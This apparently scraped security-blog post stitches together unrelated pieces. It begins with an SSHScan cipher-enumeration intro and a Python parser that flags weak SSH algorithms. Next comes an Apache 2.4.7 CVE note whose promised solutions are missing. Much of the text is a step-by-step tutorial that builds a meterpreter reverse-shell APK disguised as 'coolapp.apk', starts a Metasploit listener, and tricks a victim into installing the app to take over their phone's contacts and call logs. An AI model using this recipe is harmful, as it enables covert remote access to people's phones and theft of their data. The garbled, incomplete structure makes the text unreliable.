Category: Hacker News


Pentester Tools : SSHScan

April 10, 2018 | Hacker News | 2 Comments

SSHScan is a testing tool that enumerates SSH ciphers. We can easily detect weak ciphers by using it.



Let's try out SSHScan against BrokenWeb (a vulnerable machine) hosted locally.

Brokenweb IP : 192.168.3.107

codebreaker@zbox:~$ ./SSHScan/sshscan.py -t 192.168.3.107:22

In network pentesting, once you detect an SSH port, run SSHScan against it to detect the ciphers. If the KEX algorithm is weak, an attacker can easily create a denial-of-service attack on the SSH port, and the target will not be accessible to anyone during that time.
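An SSH server advertises its key exchange, cipher and MAC lists in the SSH_MSG_KEXINIT message (RFC 4253, section 7.1), which is where a cipher enumerator gets its data. The following is an added example, not SSHScan's own code: it parses a KEXINIT payload and reports the weak algorithms on offer. The `WEAK` policy set and the sample packet are constructed for illustration, and nothing here touches the network.

```python
# Assumed weak-algorithm policy for this example; adjust to your own baseline.
WEAK = {
    "kex": {"diffie-hellman-group1-sha1", "diffie-hellman-group-exchange-sha1"},
    "cipher": {"3des-cbc", "aes128-cbc", "arcfour", "blowfish-cbc"},
    "mac": {"hmac-md5", "hmac-md5-96", "hmac-sha1-96"},
}
# The ten name-lists of SSH_MSG_KEXINIT, in RFC 4253 section 7.1 order.
FIELDS = ["kex", "host_key", "cipher_c2s", "cipher_s2c", "mac_c2s",
          "mac_s2c", "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c"]

def parse_kexinit(payload: bytes) -> dict:
    """Parse an SSH_MSG_KEXINIT payload (starting at the message-type byte)."""
    if len(payload) < 17 or payload[0] != 20:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    pos, out = 17, {}  # skip type byte (20) and 16-byte cookie
    for name in FIELDS:
        head = payload[pos:pos + 4]  # uint32 length prefix of the name-list
        end = pos + 4 + int.from_bytes(head, "big")
        if len(head) < 4 or end > len(payload):
            raise ValueError(f"truncated name-list: {name}")
        raw = payload[pos + 4:end].decode("ascii")
        out[name] = raw.split(",") if raw else []
        pos = end
    return out

def weak_algorithms(lists: dict) -> dict:
    """Return {field: [offered weak names]} for fields covered by WEAK."""
    hits = {f: [n for n in names if n in WEAK.get(f.split("_")[0], ())]
            for f, names in lists.items()}
    return {f: h for f, h in hits.items() if h}

def build_kexinit(lists: dict) -> bytes:
    """Build a KEXINIT payload from name-lists (zero cookie, demo only)."""
    body = b"\x14" + bytes(16)
    for name in FIELDS:
        data = ",".join(lists.get(name, [])).encode("ascii")
        body += len(data).to_bytes(4, "big") + data
    return body + b"\x00" + bytes(4)  # first_kex_packet_follows + reserved

# Constructed sample: what a server with a legacy configuration might offer.
SAMPLE = build_kexinit({
    "kex": ["curve25519-sha256", "diffie-hellman-group1-sha1"],
    "host_key": ["ssh-ed25519"],
    "cipher_c2s": ["aes256-ctr", "3des-cbc"], "cipher_s2c": ["aes256-ctr"],
    "mac_c2s": ["hmac-sha2-256", "hmac-md5"], "mac_s2c": ["hmac-sha2-256"],
    "comp_c2s": ["none"], "comp_s2c": ["none"],
})

print(weak_algorithms(parse_kexinit(SAMPLE)))
```

Any field that shows up in the result is a candidate for removal from the server's `KexAlgorithms`, `Ciphers` or `MACs` settings in `sshd_config`.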

GitHub link:
https://github.com/evict/SSHScan

Installation:
git clone https://github.com/evict/SSHScan

 

If your server is running Apache 2.4.7, the chance of being hacked is high. Listing two solutions to solve this issue.

Description:

An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a publicly accessible server status page.

Proof:

  • Running HTTP service
  • Product HTTPD exists — Apache HTTPD 2.4.7
  • Vulnerable version of product HTTPD found — Apache HTTPD 2.4.7


Vulnerability ID: apache-httpd-cve-2014-0226

Solution:

Disclaimer: Hacking other devices on Wireless Networks (Wi-Fi) without explicit written permission is illegal, unless you are the legal owner of the devices you want to hack and the wireless network.

It's just a simple trick. All you need is our dear Metasploit and a bit of social engineering skill.
Here my IP is 192.168.1.33, and the system I am going to hack has the IP 192.168.1.34.
Open a terminal (as root: sudo terminator) and put in:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /home/root/coolapp.apk
e.g.: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=8080 R > /home/root/coolapp.apk
This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their Android hacked. 😀
Open the Metasploit console by typing "msfconsole", then type:
use exploit/multi/handler
Hit return and follow along as I do, one step at a time.

set payload android/meterpreter/reverse_tcp

set lhost (your lan ip address)
set lport 8080

Hit enter. Now use some social engineering tricks, like sending them a mail or sending it via Bluetooth, to give the file on the desktop titled coolapp.apk to someone who will open it (click on install > open) on their Android phone. Once you have given them the app and they are about to open it, go back to your Metasploit console and type:

exploit
This should soon open a connection with the target Android phone, where you can access a lot of features of that phone, like contacts, call log, and many more.

Feel free to comment here if you face any problems.
All the best.